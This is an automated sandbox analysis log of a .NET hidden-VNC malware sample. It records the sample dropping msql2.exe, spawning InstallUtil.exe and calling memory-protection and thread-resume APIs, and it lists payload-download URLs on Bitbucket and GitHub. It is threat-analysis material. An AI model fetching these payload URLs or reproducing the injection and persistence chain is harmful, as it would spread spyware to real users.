Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.00000000034CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aui-cdn.atlassian.com/
Source: msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.00000000034ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E97000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003507000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.00000000034CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org
Source: hvnc-CR-SCR-0710.bin.exe, msql2.exe.0.dr String found in binary or memory: https://bitbucket.org/312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.cookielaw.org/
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: hvnc-CR-SCR-0710.bin.exe, msql2.exe.0.dr String found in binary or memory: https://github.com/mariuszgromada/MathParser.org-mXparser
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1948776469.0000000004747000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe
Source: msql2.exe.0.dr String found in binary or memory: https://mathparser.org
Source: hvnc-CR-SCR-0710.bin.exe, msql2.exe.0.dr String found in binary or memory: https://mathparser.org/mxparser-license
Source: hvnc-CR-SCR-0710.bin.exe, msql2.exe.0.dr String found in binary or memory: https://mathparser.org/mxparser-tutorial/confirming-non-commercial-commercial-usecWARNING:
Source: msql2.exe.0.dr String found in binary or memory: https://mathparser.org/order-commercial-license
Source: msql2.exe.0.dr String found in binary or memory: https://payhip.com/infima
Source: hvnc-CR-SCR-0710.bin.exe, msql2.exe.0.dr String found in binary or memory: https://payhip.com/infima)
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003572000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2092862640.0000000002A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.5.30.95:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.217.90.148:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 54.231.232.1:443 -> 192.168.2.4:49743 version: TLS 1.2

System Summary

Source: 0.2.hvnc-CR-SCR-0710.bin.exe.4447550.5.raw.unpack, Record.cs Large array initialization: PatchPage: array initializer size 295456
Source: hvnc-CR-SCR-0710.bin.exe, ValStructWorker.cs Long String: Length: 10317
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064FFC10 NtResumeThread, 0_2_064FFC10
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064FE288 NtProtectVirtualMemory, 0_2_064FE288
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064FFC0A NtResumeThread, 0_2_064FFC0A
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064FE280 NtProtectVirtualMemory, 0_2_064FE280
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060FFC10 NtResumeThread, 2_2_060FFC10
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060FE288 NtProtectVirtualMemory, 2_2_060FE288
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060FFC0A NtResumeThread, 2_2_060FFC0A
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 2_2_060FE280 NtProtectVirtualMemory, 2_2_060FE280
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AFFC10 NtResumeThread, 5_2_06AFFC10
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AFE288 NtProtectVirtualMemory, 5_2_06AFE288
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AFFC0A NtResumeThread, 5_2_06AFFC0A
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 5_2_06AFE280 NtProtectVirtualMemory, 5_2_06AFE280
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1745552576.00000000066C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1724334331.000000000102E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1742387770.00000000060E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamehvnc-CR-SCR-0710.exeB vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000000.1682024434.0000000000972000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamehvnc-CR-SCR-0710.exeB vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.000000000327F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFlljiryo.exe" vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002F02000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.0000000003E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.0000000003EF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamehvnc-CR-SCR-0710.exeB vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000003168000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe Binary or memory string: OriginalFilenamehvnc-CR-SCR-0710.exeB vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.4447550.5.raw.unpack, Record.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.4447550.5.raw.unpack, CustomerExceptionDef.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.4447550.5.raw.unpack, CustomerExceptionDef.cs Cryptographic APIs: 'CreateDecryptor'
Source: hvnc-CR-SCR-0710.bin.exe, TaskMessageMessage.cs Task registration methods: 'RegisterProxy'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: classification engine Classification label: mal100.spyw.evad.winEXE@9/5@4/5
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe File created: C:\Users\user\AppData\Roaming\msql2.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: \Sessions\1\BaseNamedObjects\2a6c98df8e
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
Source: hvnc-CR-SCR-0710.bin.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: hvnc-CR-SCR-0710.bin.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: hvnc-CR-SCR-0710.bin.exe ReversingLabs: Detection: 26%
Source: hvnc-CR-SCR-0710.bin.exe Virustotal: Detection: 34%
Source: hvnc-CR-SCR-0710.bin.exe String found in binary or memory: g(2) = -Start from the license
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe File read: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe
Source: unknown Process created: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe "C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe"
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\msql2.exe "C:\Users\user\AppData\Roaming\msql2.exe"
Source: C:\Users\user\AppData\Roaming\msql2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\msql2.exe "C:\Users\user\AppData\Roaming\msql2.exe"
Source: C:\Users\user\AppData\Roaming\msql2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\msql2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\msql2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncrypt.dll Jump to behavior
